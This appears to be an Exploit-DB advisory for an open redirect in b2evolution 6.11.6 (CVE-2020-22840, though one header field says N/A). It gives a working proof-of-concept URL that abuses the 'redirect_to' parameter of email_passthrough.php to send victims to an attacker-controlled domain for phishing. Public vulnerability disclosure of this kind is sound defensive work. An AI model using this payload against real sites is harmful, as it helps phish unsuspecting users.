b2evolution 6.11.6 - 'redirect_to' Open Redirect

EDB-ID:

49554

CVE:

N/A




Platform:

PHP

Date:

2021-02-11


# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22840


--------------------------Proof of Concept-----------------------


1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
2. The user will be redirected to Google.com or any other attacker controlled domain
3. This can be used to perform malicious phishing campaigns on unsuspecting users